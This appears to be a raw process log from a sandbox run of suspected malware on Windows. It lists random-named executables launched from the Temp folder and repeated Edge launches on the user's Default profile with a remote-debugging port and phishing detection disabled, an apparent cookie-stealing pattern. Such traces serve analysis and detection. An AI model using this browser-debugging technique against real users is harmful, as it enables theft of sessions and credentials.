"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5212,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5204,i,7148252125621235404,3555082334418967925,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2456 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2600 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2260 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2424 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3308 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3764 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11498894531753433131,16912522410453394280,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2812 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2364 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3868 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7206079144991899670,9860853250256860966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4512 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8528946f8,0x7ff852894708,0x7ff852894718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2572 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2568 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3356 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2568 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3360 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

